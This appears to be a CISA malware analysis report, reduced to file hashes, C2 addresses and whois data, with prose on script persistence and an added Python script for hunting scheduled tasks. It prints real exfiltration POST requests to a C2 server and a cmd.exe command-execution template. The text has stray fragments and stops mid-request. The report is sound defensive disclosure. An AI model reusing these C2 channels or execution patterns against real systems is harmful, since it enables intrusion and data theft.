MAR-10369127.r1.v1
Malware Characterization
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.
cisa
2022-02-24T10:55:39-05:00
BMachine
38
7.1.0
goopdate.dll
90624
PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5
a27655d14b0aabec8db70ae08a623317
SHA1
8344f2c1096687ed83c2bbad0e6e549a71b0c0b1
SHA256
12db8bcee090521ecf852bf215ce3878737517a22ef1f2ff9bdec7cba8d0d3aa
SHA512
3c9fa512e7360fecc4db3196e850db8b398d1950a21a3a1f529bbc0a1323cc3b4c8d1bf95acb9ceaa794cf135a56c0e761976f17326594ce08c89117b1700514
SSDEEP
1536:Ggw+CKmmOmwE1k4XGt2EkxtNh7aZgvADsW/cd+32UVGHgz:RCBTDE1krt2Ebg5+32UQHgz
Borland Delphi 3.0 (???)
6.359392
6
2020-09-23 02:02:48-04:00
1024
MD5
dbe1463d7d1b0850df5e47b5320ef5fb
2.757475
.text
54784
6.609888
MD5
c732c8e6ad0cf8292aa60a9da9dcbe7c
.rdata
27648
5.042288
MD5
3bd80fc1bbd1476e125d2e487662e01f
.data
2560
2.366593
MD5
ccd03992b1a52aba460a01a4113d59c8
.rsrc
512
4.712298
MD5
c7a4e8ec050a078d37fff5197af953e2
.reloc
4096
6.411331
MD5
2de65738f49b99cdb71355bdc924c55a
Related_To
Characterized_By
Characterized_By
Figure 1
Figure 2
goopdate.dat
115546
data
MD5
218d4151b39e4ece13d3bf5ff4d1121b
SHA1
28e799d9769bb7e936d1768d498a0d2c7a0d53fb
SHA256
2471a039cb1ddeb826f3a11f89b193624d89052afcbee01205dc92610723eb82
SHA512
8f859945f0c3e590db99bb35f4127f34910268c44f94407e98a5399fec44d92523d07230e793209639914afe61d17dfb41273193e30bbfb950b29ffce3d4b9d5
SSDEEP
3072:bI+Rz2t2VGAQIP2DR7mOOfKI12sKDrS51ODTKjI2:bpF2t2VV2DNmOOyI8s441FjI
7.971267
Related_To
Related_To
Characterized_By
Figure 3
' part of the packet (Figure 6).
config.txt
3364
data
MD5
52299ffc8373f58b62543ec754732e55
SHA1
ca97ac295b2cd57501517c0efd67b6f8a7d1fbdf
SHA256
ce9bd1acf37119ff73b4dff989f2791eb24efc891a413df58856d848f0bcaee9
SHA512
6c9dc3ae0d3090bab57285ac1bc86d0fa60096221c99a383cc1a5a7da1c0614dfdbe4e6fa2aea9ff1e8d3415495d2d444c2f15ad9a1fd3847ddb0fc721f101a2
SSDEEP
48:oN/rGOTDwOQ0rSt4tD9f+1o09KP/iyrjfODVosSh9lwrjhChwsFKDUGymwx:qroOlfBPz5sSh+w9v
5.346853
Related_To
Connected_To
Characterized_By
Characterized_By
Characterized_By
Figure 4
Figure 5
Figure 6
185.183.96.7
Related_To
Related_To
Connected_From
Related_To
443
TCP
185.183.96.7/index.php
Queried whois.ripe.net with "-B 185.183.96.7"...
% Information related to '185.183.96.0 - 185.183.96.255'
% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'
inetnum: 185.183.96.0 - 185.183.96.255
netname: EU-HOSTSAILOR
descr: HostSailor NL Services
country: NL
admin-c: AA31720-RIPE
tech-c: AA31720-RIPE
status: ASSIGNED PA
mnt-by: MNT-HS
created: 2016-12-23T09:52:06Z
last-modified: 2016-12-23T09:52:06Z
source: RIPE
person: Ali Al-Attiyah
address: Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area
address: Dubai P.O. Box 98362
address: United Arab Emirates
phone: +971 455 77 845
nic-hdl: AA31720-RIPE
mnt-by: MNT-HS
created: 2016-12-21T19:19:26Z
last-modified: 2019-03-18T14:07:12Z
source: RIPE
% Information related to '185.183.96.0/24AS60117'
route: 185.183.96.0/24
descr: EU-HOSTSAILOR 185.183.96.0/24
origin: AS60117
mnt-by: MNT-HS
created: 2016-12-23T09:50:04Z
last-modified: 2016-12-23T09:50:04Z
source: RIPE
libpcre2-8-0.dll
96768
PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5
860f5c2345e8f5c268c9746337ade8b7
SHA1
6c55d3acdc2d8d331f0d13024f736bc28ef5a7e1
SHA256
9d50fcb2c4df4c502db0cac84bef96c2a36d33ef98c454165808ecace4dd2051
SHA512
15b758ada75ae3a6848e3e528e07b19e0efb4156105f0e2ff4486c6df35574c63ccaae5e00d3c4f1ac3f5032f3eb5732179d187979779af4658e8e4dc5020f9f
SSDEEP
1536:TjdtPuB/MpXu7QeqqPKaSc9/Sc+Amru3xobZFsWo/dcd+0Q+MoOl5:TfuBwXuUeqqPIkSc4u3xobb+0Q+MRl5
Borland Delphi 3.0 (???)
6.397339
6
2020-10-05 03:59:42-04:00
1024
MD5
b474b7d68214633e93dc1ab3fcad9a4b
2.769462
.text
55296
6.612472
MD5
d9e1cff126e23d40d396bebc0fe103be
.rdata
33280
5.178997
MD5
8528c24241b97c45d2f90f3ef1baceec
.data
2560
2.380258
MD5
96565e257370e82ea6cc20bdc7831a7b
.rsrc
512
4.717679
MD5
43041985e356ec1bb76514dd6d7a347f
.reloc
4096
6.435504
MD5
6b5a16c382d161788b9cc48d74f91543
vcruntime140.dll
93696
PE32 executable (DLL) (console) Intel 80386, for MS Windows
MD5
cec48bcdedebc962ce45b63e201c0624
SHA1
81f46998c92427032378e5dead48bdfc9128b225
SHA256
dd7ee54b12a55bcc67da4ceaed6e636b7bd30d4db6f6c594e9510e1e605ade92
SHA512
661a59b4cdb4aab652b24cb9b7ca54cdee1d50ac3b0479cb418cf8ec2f7bda15fcc2622e6b08a784187ec3f43acd678d1d73efacd43ac33501963d5e4dfe32e9
SSDEEP
1536:jjevM3civEZfW15lbrWKIAy4pcd8uHxQEbZFsWo/dcdV0yjHe9c0b5i2MUql5:jzcbfO5lbr6Ay4huHxHbbV0eHe9c0b5I
Borland Delphi 3.0 (???)
6.386276
6
2020-10-11 08:50:42-04:00
1024
MD5
644538127a7d5372f16bbc62790e1b5d
2.778786
.text
55808
6.623812
MD5
46d87fd65afee2330ee32fe404fe7657
.rdata
29696
5.111049
MD5
7bc20c2666aeb10cbe1787cdeeb38138
.data
2560
2.380664
MD5
8adf7f42b993b6d8b658ea5a9d554a49
.rsrc
512
4.717679
MD5
065463fcb19d087772450d47229f013f
.reloc
4096
6.466938
MD5
1a870fa886d593f0dd1c9ce8816c3a63
Core.dat
222554
data
MD5
a65696d6b65f7159c9ffcd4119f60195
SHA1
570f7272412ff8257ed6868d90727a459e3b179e
SHA256
b5b1e26312e0574464ddef92c51d5f597e07dba90617c0528ec9f494af7e8504
SHA512
65661ca585e10699eaded4f722914c79b5922e93ea4ca8ecae4a8e3f1320e7b806996f7a54dffbe9d1cdeda593f08e8d95cd831d57de9d9568ea6d8bd280988b
SSDEEP
6144:AD5ss4qHWpWYY3X3YxMNkpMj7vl+AQOjI:Uss4QEWYwYxM+CdZ3
7.990578
Core.dat
222554
data
MD5
4a022ea1fd2bf5e8c0d8b2343a230070
SHA1
89df0feca9a447465d41ac87cb45a6f3c02c574d
SHA256
e7baf353aa12ff2571fc5c45184631dc2692e2f0a61b799e29a1525969bf2d13
SHA512
bec85adf79b916ee64c4a4b6f2cf60d8321d7394a2ec299c3547160f552ecae403c6a2a9aa669cf789d4d99b01c637ac1d0da3c9ed8872bb6184b5ad9543d580
SSDEEP
6144:HzUl+nQWOJ0h0Q+MhozbM8RTVwS9HTkSaRIJjI:HzNQkC06bZuSBTky
7.990584
Dore.dat
208222
PE32 executable (GUI) Intel 80386, for MS Windows
MD5
6c084c8f5a61c6bec5eb5573a2d51ffb
SHA1
61608ed1de56d0e4fe6af07ecba0bd0a69d825b8
SHA256
7e7545d14df7b618b3b1bc24321780c164a0a14d3600dbac0f91afbce1a2f9f4
SHA512
4eaa2d6f29d2712f3487ff7e3a463ec4ba711ba36edda422db126840282e8705ebee6304cc9a54433c7fac7759f98a9543eda881726d8b788f4487b8d4f42423
SSDEEP
6144:LiJOsC/WBmefvpzeChVsg3euJHs7pdcAOlnI:LLWBmyvp/s5uJHs7pdcvI
Microsoft Visual C++ ?.?
6.489815
6
2020-10-11 08:50:37-04:00
1024
MD5
57e428c7f6e8430e0380e9a1681a940c
2.806123
.text
135168
6.614331
MD5
89eb652b81f7b3cd7e9ee9e718575c09
.rdata
58368
5.330927
MD5
4f6c6295c85743cc3a2ca8f5dc2c4648
.data
4096
3.056628
MD5
3fe517cfbe9700ed9c311661377fcbd9
.rsrc
512
4.711341
MD5
7d123d6987b6fa0f191e9ee2fb0d9484
.reloc
8704
6.441951
MD5
320df1e8ed4184af06bb4c62a00cc47b
config.txt
3615
data
MD5
b6b0edf0b31bc95a042e13f3768a65c3
SHA1
5168a8880abe8eb2d28f10787820185fe318859e
SHA256
b6133e04a0a1deb8faf944dd79c46c62f725a72ea9f26dd911d6f6e1e4433f1a
SHA512
669e655ca79c95d8d25e56cb0c4c71574ff74f55e11930e9cdbfb4a3767fce0d09ab362d2f188a153ba25497b8a2508d0501bca342c0558f06e921f603b2218c
SSDEEP
48:oOd/U/82KlaUdrSS1A82RBBboWuP7qgGgmzfBUXX7PXTWPJJ5wx:YmP71+Ju
5.291145
Connected_To
185.117.75.34
Connected_From
Related_To
Related_To
Connected_From
443
TCP
Queried whois.ripe.net with "-B 185.117.75.34"...
% Information related to '185.117.75.0 - 185.117.75.255'
% Abuse contact for '185.117.75.0 - 185.117.75.255' is 'abuse@hostsailor.com'
inetnum: 185.117.75.0 - 185.117.75.255
netname: EU-HOSTSAILOR-20140124
descr: HostSailor NL Services
country: NL
admin-c: AF11712-RIPE
tech-c: AF11712-RIPE
status: ASSIGNED PA
mnt-by: MNT-HS
created: 2016-02-01T08:50:02Z
last-modified: 2016-02-01T08:50:02Z
source: RIPE
person: Host Sailor Ltd - Administrative role account
address: Suite No: 1605, Churchill Executive Tower, Burj Khalifa Area
address: Dubai P.O. Box 98362
address: United Arab Emirates
phone: +97145577845
nic-hdl: AF11712-RIPE
mnt-by: MNT-HS
created: 2014-06-30T16:22:26Z
last-modified: 2019-05-29T09:39:31Z
source: RIPE
Config.txt
5037
ASCII text, with very long lines, with no line terminators
MD5
a0421312705e847a1c8073001fd8499c
SHA1
3204447f54adeffb339ed3e00649ae428544eca3
SHA256
9cb79736302999a7ec4151a43e93cd51c97ede879194cece5e46b4ff471a7af7
SHA512
32c89ce4ec39c0f05fdd578ac7dbd51a882fdca632a00a591655992f258fe1b870c5ac6732d79c835578fd85c237d69d10886b1bec087217b921b8dbd2d7ab50
SSDEEP
96:ND25Bb2G+6C3z+FPyY1PgWuRuSpqq8HRYwC+w7ivocD6ZpY59lmBZ1q0c3:NKnCGO3iFPysIW8YlHRYw5w6F6ZpYUB0
5.941005
192.210.191.188
Connected_From
Related_To
Related_To
443
TCP
Queried whois.arin.net with "n ! NET-192-210-191-0-1"...
NetRange: 192.210.191.0 - 192.210.191.255
CIDR: 192.210.191.0/24
NetName: CC-192-210-191-0-24
NetHandle: NET-192-210-191-0-1
Parent: CC-11 (NET-192-210-128-0-1)
NetType: Reallocated
OriginAS: AS36352
Organization: Virtual Machine Solutions LLC (VMSL-100)
RegDate: 2019-03-26
Updated: 2019-03-26
Ref: https://rdap.arin.net/registry/ip/192.210.191.0
OrgName: Virtual Machine Solutions LLC
OrgId: VMSL-100
Address: 12201 Tukwila International Blvd
City: Seattle
StateProv: WA
PostalCode: 98168
Country: US
RegDate: 2016-06-22
Updated: 2020-12-10
Comment: http://virmach.com/abuse to report abuse.
Ref: https://rdap.arin.net/registry/entity/VMSL-100
OrgTechHandle: GOLES88-ARIN
OrgTechName: Golestani, Amir
OrgTechPhone: +1-800-877-2176
OrgTechEmail: report@virmach.com
OrgTechRef: https://rdap.arin.net/registry/entity/GOLES88-ARIN
OrgAbuseHandle: GOLES88-ARIN
OrgAbuseName: Golestani, Amir
OrgAbusePhone: +1-800-877-2176
OrgAbuseEmail: report@virmach.com
OrgAbuseRef: https://rdap.arin.net/registry/entity/GOLES88-ARIN
Config2.txt
5037
ASCII text, with very long lines, with no line terminators
MD5
a16f4f0c00ca43d5b20f7bc30a3f3559
SHA1
94e26fb2738e49bb70b445315c0d63a5d364c71b
SHA256
5bcdd422089ed96d6711fa251544e2e863b113973db328590cfe0457bfeb564f
SHA512
e1f929029e7382e0a900fb3523dbc175d503b1903b034d88aed3e50aed768ce79c52091520e4a3e40c04e00ab70af3d438de35c79502ff8b11adcb45f6f666bd
SSDEEP
96:ND25Bb2FNushsy1XSWSAIm0Rs1yjLzJ8f3zT+ujYa42g2QR4HElM+ejX+2jIQSgp:NKnCFvsLcIm0bfzAd4F6HEl92pSgoFu
5.935676
Connected_To
AntheHannah_config.txt
3491
data
MD5
51bc53a388fce06487743eadc64c4356
SHA1
b9e6fc51fa3940fb632a68907b8513634d76e5a0
SHA256
9ec8319e278d1b3fa1ccf87b5ce7dd6802dac76881e4e4e16e240c5a98f107e2
SHA512
43d291535b7521a061a24dc0fb1c573d1d011f7afa28e8037dea69eb5ae5bcd69b53a01a636e91827831066f9afc84efc1d556f64dc5cd780f9da79d38783b70
SSDEEP
48:oJX/VlShMEtkDJrSYChZh60cIpoEzMPkQwpCUOfcUeHe0eGeBr8ONIPoUy3pIhwx:uStoJCXhbcIvgPkQw8rfcR+xjBrRUsT
5.319055
TeresitaJordain_config.txt
3580
data
MD5
0ac499496fb48de0727bbef858dadbee
SHA1
483cd5c9dd887367793261730d59178c19fe13f3
SHA256
255e53af8b079c8319ce52583293723551da9affe547da45e2c1d4257cff625a
SHA512
be0d181aabd07b122fcdb79a42ba43ed879a5f0528745447f2c93c6d9cb75c00f1d581520c640fd7f4a61a6f27ef82d99ad09ee2f1cc85340252a7eb7a9fa7a1
SSDEEP
48:oHyk/BbLGAQUJaqQNMWyT1veKRzKykrSaowAQncpQNiqyC2V+mqoS3NwPK+2/t+Q:dyF1p7cKRzDbRBCUDP9X5NbfZJRQURC7
5.296734
Connected_To
185.183.96.44
Related_To
Related_To
Connected_From
443
TCP
Queried whois.ripe.net with "-B 185.183.96.44"...
% Information related to '185.183.96.0 - 185.183.96.255'
% Abuse contact for '185.183.96.0 - 185.183.96.255' is 'abuse@hostsailor.com'
inetnum: 185.183.96.0 - 185.183.96.255
netname: EU-HOSTSAILOR
descr: HostSailor NL Services
country: NL
admin-c: AA31720-RIPE
tech-c: AA31720-RIPE
status: ASSIGNED PA
mnt-by: MNT-HS
created: 2016-12-23T09:52:06Z
last-modified: 2016-12-23T09:52:06Z
source: RIPE
person: Ali Al-Attiyah
address: Suite No: 1605, Churchill Executive Tower, Burf Khalifa Area
address: Dubai P.O. Box 98362
address: United Arab Emirates
phone: +971 455 77 845
nic-hdl: AA31720-RIPE
mnt-by: MNT-HS
created: 2016-12-21T19:19:26Z
last-modified: 2019-03-18T14:07:12Z
source: RIPE
% Information related to '185.183.96.0/24AS60117'
route: 185.183.96.0/24
descr: EU-HOSTSAILOR 185.183.96.0/24
origin: AS60117
mnt-by: MNT-HS
created: 2016-12-23T09:50:04Z
last-modified: 2016-12-23T09:50:04Z
source: RIPE
HeidieLeone.txt
706
ASCII text, with very long lines, with no line terminators
MD5
d68f5417f1d4fc022067bf0313a3867d
SHA1
2f6dd6d11e28bf8b4d7ceec8753d15c7568fb22e
SHA256
e7f6c7b91c482c12fc905b84dbaa9001ef78dc6a771773e1de4b8eade5431eca
SHA512
39023583902e616a196357a69ab31371842f3b6119914803b19e62388dc873ab02567ac398148f84c68adac6228a8cb4e83afb0be24bdf1603a618669030bf39
SSDEEP
12:B6V3vKH/RRNyzV3vowKzV3voDPMV3v7SzV3vHzvm5V3vWQ52LgxxOWpgVEQgjVoL:sV3E/ozV3pKzV3GPMV3OzV3j4V3OQ4sI
5.145602
Connected_To
/
--End GET request--
note.js is launched with the native Windows script host "WScript.exe". Its manifestation function assembles the parameters of the GET request to 185[.]118[.]164[.]21 and of the scheduled task (Figure 7 and Figure 8).
For persistence, the same function copies the file to the user's Contacts folder and creates a Scheduled Task that recurs daily at 10:01 AM, relaunching the PowerShell beacon to 185[.]118[.]164[.]21 (Figure 9).
note.js
3235
ASCII text, with very long lines, with CRLF line terminators
MD5
c0c2cd5cc018e575816c08b36969c4a6
SHA1
47a4e0d466bb20cec5d354e56a9aa3f07cec816a
SHA256
b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c
SHA512
4b930da1435a72095badaeca729baca8d6af9ab57607e01bd3dd1216eee75c8f8b7981a92640d475d908c6f22811900133aed8ab8513c38f5bc82b60752bf929
SSDEEP
96:/r9/hIgY/5N8s2Q5bQRWs4uQ5WQRWumVxE1Fq:T9/hILLdpG4Rdmwq
5.200319
Characterized_By
Connected_To
Characterized_By
Characterized_By
Characterized_By
Characterized_By
Characterized_By
Figure 7
Figure 8a
Figure 8b
Figure 9
Figure 10a
Figure 10b
185.118.164.21
Related_To
Related_To
Related_To
Connected_From
Connected_From
80
TCP
185.118.164.21/index?param=<computer_name>/<username>
Queried whois.ripe.net with "-B 185.118.164.21"...
% Information related to '185.118.164.0 - 185.118.165.255'
% Abuse contact for '185.118.164.0 - 185.118.165.255' is 'abuse@profitserver.ru'
inetnum: 185.118.164.0 - 185.118.165.255
netname: RU-CHELYABINSK-SIGNAL-20150923
country: RU
admin-c: AN29881-RIPE
tech-c: AN29881-RIPE
status: ASSIGNED PA
mnt-by: ru-chelyabinsk-signal-1-mnt
created: 2016-10-12T10:22:21Z
last-modified: 2016-10-12T10:22:21Z
source: RIPE
person: Alexey Nevolin
address: Ordzhonikidze str., 54-B
address: 454091
address: Chelyabinsk
address: RUSSIAN FEDERATION
phone: +7 3517299971
nic-hdl: AN29881-RIPE
mnt-by: ru-chelyabinsk-signal-1-mnt
created: 2015-09-18T15:23:57Z
last-modified: 2015-09-18T15:23:58Z
source: RIPE
% Information related to '185.118.164.0/24AS44493'
route: 185.118.164.0/24
descr: Chelyabinsk-Signal
origin: AS44493
mnt-by: ru-chelyabinsk-signal-1-mnt
created: 2015-11-17T05:53:42Z
last-modified: 2015-11-17T05:53:42Z
source: RIPE
/
--End GET Request--
This file performs the same tasks as "note.js" (b1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c) and is launched with the native "WScript.exe"; rj.js gains persistence by copying itself to the user's Contacts folder and creating a Scheduled Task that relaunches the PowerShell script daily at 10:01 AM.
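The persistence described for note.js and rj.js (a script copied into the user's Contacts folder, relaunched by a Scheduled Task daily at 10:01 AM) is easy to hunt for from a task export. The following Python is an added example, not code from the CISA report or from the malware: it parses the CSV that `schtasks /query /fo CSV /v` prints on a Windows host and flags tasks that match the reported pattern. The task names, paths and rows in SAMPLE_SCHTASKS_CSV are constructed for the example (the report contains no task export), and every function name is this example's own assumption.

```python
"""Scheduled-task triage for the note.js / rj.js persistence described above.

Added example; not code from the CISA report. Reads `schtasks /query /fo CSV /v`
output and flags tasks that match the report: a script under the user's Contacts
folder relaunched daily at 10:01 AM. Sample rows below are constructed.
"""
import csv
import io
import re

# Column headers as printed by `schtasks /query /fo CSV /v` (only these are used).
TASK_NAME, TASK_TO_RUN, SCHEDULE_TYPE, START_TIME = (
    "TaskName", "Task To Run", "Schedule Type", "Start Time")

# A script living under <profile>\Contacts\ is the persistence location in the report.
CONTACTS_PATH = re.compile(r"(\\Users\\[^\\]+|%USERPROFILE%)\\Contacts\\", re.IGNORECASE)
# Hosts that would execute note.js / rj.js or the PowerShell beacon they relaunch.
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|powershell)(\.exe)?\b", re.IGNORECASE)


def starts_at_1001(start_time):
    """True if a schtasks 'Start Time' value ('10:01:00 AM', '10:01') is 10:01."""
    m = re.match(r"\s*(\d{1,2}):(\d{2})(?::\d{2})?\s*([AP]M)?", start_time, re.IGNORECASE)
    if not m:
        return False
    hour, minute = int(m.group(1)), int(m.group(2))
    meridiem = (m.group(3) or "").upper()
    if meridiem == "PM" and hour != 12:
        hour += 12
    if meridiem == "AM" and hour == 12:
        hour = 0
    return (hour, minute) == (10, 1)


def triage_task(row):
    """Verdict for one task row; an action under Contacts is enough on its own."""
    action = row.get(TASK_TO_RUN, "")
    in_contacts = CONTACTS_PATH.search(action) is not None
    script_host = SCRIPT_HOST.search(action) is not None
    daily_1001 = (row.get(SCHEDULE_TYPE, "").strip().lower() == "daily"
                  and starts_at_1001(row.get(START_TIME, "")))
    reasons = []
    if in_contacts:
        reasons.append("action runs a file from the user's Contacts folder")
    if script_host:
        reasons.append("action launches a script host")
    if daily_1001:
        reasons.append("daily trigger at 10:01, as reported for note.js and rj.js")
    # Script hosts and daily tasks are common on their own; require the combination.
    flagged = in_contacts or (script_host and daily_1001)
    return {"task": row.get(TASK_NAME, ""), "flagged": flagged, "reasons": reasons}


def hunt(schtasks_csv):
    """Run triage over schtasks CSV output and return only the flagged tasks."""
    hits = []
    for row in csv.DictReader(io.StringIO(schtasks_csv.strip())):
        if row.get(TASK_NAME) == TASK_NAME:  # schtasks repeats the header per task folder
            continue
        verdict = triage_task(row)
        if verdict["flagged"]:
            hits.append(verdict)
    return hits


# Constructed sample (not a real export): one task shaped like the reported
# persistence and two benign ones. Hostname/user are the report's placeholders.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Next Run Time","Status","Task To Run","Schedule Type","Start Time","Run As User"
"WIN-HVMLL1IR74C","\Updater","11/2/2021 10:01:00 AM","Ready","wscript.exe C:\Users\user01\Contacts\note.js","Daily","10:01:00 AM","user01"
"WIN-HVMLL1IR74C","\Microsoft\Windows\Defrag\ScheduledDefrag","11/3/2021 1:00:00 AM","Ready","%windir%\system32\defrag.exe -c -h -o -$","Weekly","1:00:00 AM","SYSTEM"
"WIN-HVMLL1IR74C","\Backup","11/2/2021 10:01:00 PM","Ready","powershell.exe -File C:\Scripts\backup.ps1","Daily","10:01:00 PM","admin"
'''

if __name__ == "__main__":
    for hit in hunt(SAMPLE_SCHTASKS_CSV):
        print(hit["task"], "->", "; ".join(hit["reasons"]))
```

The 10:01 trigger is what the report observed for these two samples; other builds may use a different time, which is why a task whose action runs from the Contacts folder is flagged regardless of schedule, while a script-host launch is only flagged together with the reported trigger. Feed the function the real `schtasks /query /fo CSV /v` output (or a converted Get-ScheduledTask export) rather than the constructed sample.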
rj.js
5257
ASCII text, with very long lines
MD5
37fa9e6b9be7242984a39a024cade2d5
SHA1
0211569091b96cffab6918e18ccc97f4b24d88d4
SHA256
42ca7d3fcd6d220cd380f34f9aa728b3bb68908b49f04d04f685631ee1f78986
SHA512
889f293af25aa3af14c580000f15ade58e5b6b6000f42ddf38b69fd74a663b4c92cc2a90bfc9804d9de194e1eeee734f0b9e0ea5838afbc09f6fa3bfb3f5891c
SSDEEP
96:ub0werybmdzpcY3EUCGYZoTuEDdEyh8G2ng7qci1yMA1h5+N:ub09ymdzpcY3BOZIDmyh8G2ntci1P856
5.422642
Connected_To
FML.dll
210397496
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5
0431445d6d6e5802c207c8bc6a6402ea
SHA1
3765c1ad8a1d936aad88255aef5d6d4ce24f94e8
SHA256
3098dd53da40947a82e59265a47059e69b2925bc49c679e6555d102d1c6cbbc8
SHA512
f46d71a66aa615efdcec37ff282201695f6216a8903a83edee874ced321b8a090baf1054e77bd3ed642e5da60522ea245e1741726fc4b49ccbef11203f5790bf
SSDEEP
3145728:LFiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiQ9FiY:AQyQyQyQyQyQyQyQyQyQyQyQyY
7.999913
8
2020-01-20 09:19:24-05:00
1024
MD5
fea26576aaf64f90e067892d07fb8f97
3.335479
.text
468992
6.42081
MD5
11cc597cf11ee87c3a0f76dcecf7556a
.rdata
167936
4.843554
MD5
52f5c458bae1ec48fc650d0975663910
.data
11264
4.040157
MD5
f7a88a7f326a63079052f1884b57e3a8
.pdata
25088
5.777552
MD5
c2b5de9421b4a0c9b7d4688f4ae051ac
.tls
512
0.020393
MD5
1f354d76203061bfdd5a53dae48d5435
.rsrc
209716224
8.0
MD5
37b679e67208f1af8eed89301450017a
.reloc
5120
5.322063
MD5
ef43c49686a0f7100f95a3dfa50d84ea
Characterized_By
Characterized_By
Characterized_By
Characterized_By
Figure 11
Figure 12
Figure 13
Figure 14
Cooperation terms.xls
252928
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: pc, Last Saved By: interstellar, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Sep 29 20:38:56 2021, Last Saved Time/Date: Mon Oct 4 07:32:17 2021, Security: 0
MD5
b0ab12a5a4c232c902cdeba421872c37
SHA1
a8e7659942cc19f422678181ee23297efa55fa09
SHA256
026868713d60e6790f41dc7046deb4e6795825faa903113d2f22b644f0d21141
SHA512
c1ff4c3bd44e66e45cdb66b818a963d641cde6b9ea33ac64374929f182cd09e944d9337a588ba99d3df98190ba979431d015d848aa09c2d93763a1ed795ff304
SSDEEP
6144:Lk3hOdsylKlgryzc4bNhZF+E+W2knAcYi4uU4pVZ8lx+tSeJBWC:5iLZpVZ8lx+tn3WC
7.16796
Dropped
Dropped
Characterized_By
Characterized_By
Figure 15
Figure 16
Outlook.wsf
11692
HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5
e182a861616a9f12bc79988e6a4186af
SHA1
69840d4c4755cdab01527eacbb48577d973f7157
SHA256
c2badcdfa9b7ece00f245990bb85fb6645c05b155b77deaf2bb7a2a0aacbe49e
SHA512
0eb88fe297d296569063874bead48c8b2998edc6779f5777f533de241fa49d7cb4aadc189bcdd07783ad2d669ac35344b2385c62859bc5b0c6fbe55e4857002b
SSDEEP
192:qK8Lkrc2HWT1jbAaBLGFNN68RNEFQQrrl+lBAlJlgQGtb0UqQYGQrQoGuQgQXPY5:qK82ZWTd/LYNBRNEFl+l2lJlGdPUlcKp
4.062618
Dropped_By
Characterized_By
Figure 17
> %temp%\\h.txt
Select * from Win32_IP4RouteTable
"%COMPUTERNAME%"
"%USERNAME%"
--End strings--
It collects the victim's system IP address, computer name, and username in the format below:
--Begin information--
Format: [victim's system Internet Protocol address]|#@*@#|[Computer name]/Username
Sample: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01"
--End information--
The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the Uniform Resource Identifier (URI): "http[:]//88[.]119[.]170[.]124/ezedcjrfvjriftmldedu" and wait for a response.
Displayed below is the POST request used to exfiltrate the victim's system data:
--Begin request--
POST /ezedcjrfvjriftmldedu HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
CharSet: UTF-8
Content-Length: 93
Host: 88[.]119[.]170[.]124
vl=1693273632E6349334E37235340D743442D53463ED34C7CC2214A90423C5494228E4F7032293856253E6216713
--End request--
The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex-encoded and reshuffled. The script uses the same built-in algorithm to re-order and hex-decode these payloads, which contain command-line scripts. It searches the decoded payload for the string "|#@*@#|" or "/!*##*!/"; if either is present, it parses out the command-line scripts and executes them with the command below:
--Begin command--
"cmd.exe /c [decoded command scripts]| >> %temp%\\h.txt"
--End command--
The output of the command-line scripts executed is stored into a text file "%temp%\h.txt". It reads the output of the command executed from the text file "%temp%\h.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:
--Begin format--
Format: "[victim's system Internet Protocol address]|#@*@#|[Computer name]/Username|#@*@#|[Output of the command executed]"
Sample observed: "19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"
--End format--
The above victim's system's information and the output command data are hex-encoded, and the hex bytes are re-ordered and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof" and wait for a response (next command).
Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:
--Begin request--
POST /lcekcnkxkbllmwlpoklgof HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
